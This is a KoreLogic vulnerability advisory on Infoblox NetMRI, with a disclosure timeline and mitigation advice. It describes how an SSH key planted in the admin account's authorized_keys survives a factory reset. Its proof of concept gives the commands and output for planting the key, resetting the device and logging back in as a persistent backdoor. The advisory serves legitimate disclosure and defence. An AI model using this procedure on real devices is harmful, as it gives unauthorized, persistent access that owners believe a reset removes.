Infoblox NetMRI VM-AD30-5C6CE Factory Reset Persistence

`KL-001-2017-018 : Infoblox NetMRI Administration Shell Factory Reset Persistence  
  
Title: Infoblox NetMRI Administration Shell Factory Reset Persistence  
Advisory ID: KL-001-2017-018  
Publication Date: 2017.10.24  
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-018.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: Infoblox  
Affected Product: NetMRI  
Affected Version: VM-AD30-5C6CE  
Platform: Embedded Linux  
CWE Classification: CWE-485: Insufficient Encapsulation  
Impact: Administrative Account Backdoor  
Attack vector: SSH  
  
2. Vulnerability Description  
  
An authenticated user who has escaped the management shell  
can install a public SSH key which will survive factory resets.  
  
3. Technical Description  
  
1. Create a SSH keypair.  
  
$ ssh-keygen -f netrmi-backdoor  
Generating public/private rsa key pair.  
Enter passphrase (empty for no passphrase):  
Enter same passphrase again:  
Your identification has been saved in netrmi-backdoor.  
Your public key has been saved in netrmi-backdoor.pub.  
The key fingerprint is:  
1e:d6:55:7b:f6:a1:a5:9f:ea:8d:2b:4d:5d:ae:9e:19 fake@fake  
The key's randomart image is:  
+--[ RSA 2048]----+  
| . |  
| . . |  
| . .oo|  
| . . +o+|  
| S . o..o|  
| o . ...o|  
| . o E+ |  
| . .=+ |  
| o*=. |  
+-----------------+  
  
2. As 'admin' from a escaped shell, echo the public key to authorized_keys.  
  
[admin@NetMRI-VM-AD30-5C6CE ~]$ echo ssh-rsa  
AAAAB3NzaC1yc2EAAAADAQABAAABAQDmjcavayYmGgsNUggeILWSw8qGKAZeWkH/01oP/1M8d249zYBJRHri0hJn13DItuOCn/1/RWxFQsUtoph2dHsAnOYPZXEXofPfmWbqOdaOOK+TbrMAgc0CdgKtIDE01LHob4S8s4N//jCHGWUQzv5KAUebRUtR1K7STAQdMnKbhZeoUBoVgvekjnZZ+3gFGg6C7FDg3Z8VstWYJmqxo7N4awEI95fnJ551O4sr9owdIwoZ5OhO0cbt8HGzoCsdbinICKUg3CIhfnmLnNfHtySmBf6srFx7QQ3Gy5lmW7nXNEYrDoXc37H+mpSR0rtPtuWr9GolP9ccHbbIyQXL6frV  
fake@fake >> /home/admin/.ssh/authorized_keys  
[admin@NetMRI-VM-AD30-5C6CE ~]$ exit  
exit  
[admin@NetMRI-VM-AD30-5C6CE Backup]$ exit  
exit  
ping: IDN encoding of '' failed with error code 5  
  
3. Factory reset the system using the management shell.  
  
NetMRI-VM-AD30-5C6CE> ?  
  
Available Commands:  
acl ftp md5sum register setup  
autoupdate grep more remoteCopy show  
cat halt netstat removedsb snmpwalk  
clear help ping removemib ssh-key  
configure installdsb provisiondisk repair supportbundle  
debug installhelpfiles quit reset telnet  
deregister installmib rdtclient restore tftpsync  
diagnostic license reboot rm top  
exit ls recalculate-spm route traceroute  
export maintenance refreshgroups set  
  
NetMRI-VM-AD30-5C6CE> reset  
  
Reset Commands:  
admin cli snmp tunclient  
all_licenses database system  
  
NetMRI-VM-AD30-5C6CE> reset system  
  
*******************************************************************  
WARNING WARNING WARNING WARNING WARNING  
  
This script deletes the network database, all database archive  
files, all server logs, all issue details, all files stored  
in the administrator shell directory and all user logins.  
This script also resets the administrator password to 'admin'  
and erases all customer-specific configuration information.  
  
WARNING WARNING WARNING WARNING WARNING  
*******************************************************************  
  
Do you really want to reset (y|n)? [n]y  
  
+++ Stopping Server ...  
+++ Clearing MQ data ...  
+++ Removing Server Logs ...  
+++ Removing User Logins ...  
+++ Resetting Admin Password ...  
+++ Clearing Network Database ...  
+++ Clearing All Config Files ...  
+++ Clearing subscribers and subscriptions ...  
+++ Clearing reports ...  
+++ Clearing device support bundles ...  
+++ Removing Certificates ...  
+++ Rebuilding database ...  
+++ Restoring pre-packaged policies ...  
+++ Resetting Server Configuration ...  
Server is down, skipping comm server restart  
+++ Installing Weekly Maintenance Process ...  
+++ Resetting Server Name ...  
+++ Resetting Banner Logo ...  
+++ Resetting Network Interfaces ...  
+++ Processing Interface eth0 ...  
+++ Processing Interface eth1 ...  
+++ Processing Interface eth2 ...  
+++ Processing Interface eth3 ...  
+++ Resetting DNS Configuration ...  
+++ Clearing Admin Directory ...  
+++ Resetting Firewall Settings ...  
+++ Resetting Time Zone ...  
+++ Resetting Security Settings ...  
  
#############################################################  
The system needs to be rebooted to complete the reset process  
#############################################################  
  
Enter 'reboot' or 'halt' [reboot]: reboot  
+++ Reset Complete  
  
+++ Rebooting System ...  
  
Broadcast message from admin@NetMRI-VM-AD30-5C6CE on pts/0 (Mon, 13 Mar 2017 18:59:02 -0400):  
  
The system is going down for reboot NOW!  
  
Connection to 1.3.3.7 closed by remote host.  
  
4. Login to the system using the private key.  
  
$ ssh -i netrmi-backdoor [email protected]  
NetMRI VM-AD30-5C6CE  
ALL UNAUTHORIZED ACCESS TO THIS SYSTEM WILL BE PROSECUTED TO THE MAXIMUM EXTENT ALLOWED BY APPLICABLE LAWS.  
Last login: Mon Mar 13 17:00:07 2017 from 1.3.3.7  
  
************************************************************************  
ALL UNAUTHORIZED ACCESS TO THIS SYSTEM WILL BE PROSECUTED TO THE MAXIMUM  
EXTENT ALLOWED BY APPLICABLE LAWS.  
************************************************************************  
  
NetMRI Administrative Shell  
---------------------------  
  
Available Commands:  
acl ftp md5sum register setup  
autoupdate grep more remoteCopy show  
cat halt netstat removedsb snmpwalk  
clear help ping removemib ssh-key  
configure installdsb provisiondisk repair supportbundle  
debug installhelpfiles quit reset telnet  
deregister installmib rdtclient restore tftpsync  
diagnostic license reboot rm top  
exit ls recalculate-spm route traceroute  
export maintenance refreshgroups set  
  
NetMRI-VM-AD30-5C6CE>  
  
4. Mitigation and Remediation Recommendation  
  
There is no known remediation for this vulnerability from the  
vendor. Administrators should heavily restrict access to any  
account of any privilege which can use the ping command in  
the NetMRI CLI.  
  
Network access to management interfaces should be properly segmented.  
  
Assuming the lack of input sanitation in the NetMRI CLI is not  
addressed: Use that vulnerability to check for the existence  
any SSH keys. No keys should be present.  
  
5. Credit  
  
This vulnerability was discovered by Matt Bergin (@thatguylevel)  
of KoreLogic, Inc.  
  
6. Disclosure Timeline  
  
2017.07.21 - KoreLogic requests security contact and PGP key from  
Infoblox.  
2017.07.21 - Infoblox suggests '[email protected]' with  
PGP key id 0xC4AB2799.  
2017.07.24 - KoreLogic submits vulnerability information to Infoblox.  
2017.07.31 - 5 business days have elapsed since the vulnerability  
was reported. No response from Infoblox.  
2017.09.15 - KoreLogic requests update from Infoblox.  
2017.09.26 - 45 business days have elapsed since the vulnerability  
was reported to Infoblox.  
2017.10.17 - KoreLogic requests an update from Infoblox.  
2017.10.18 - 60 business days have elapsed since the vulnerability  
was reported to Infoblox.  
2017.10.24 - KoreLogic public disclosure.  
  
7. Proof of Concept  
  
See 3. Technical Description.  
  
  
The contents of this advisory are copyright(c) 2017  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt  
  
`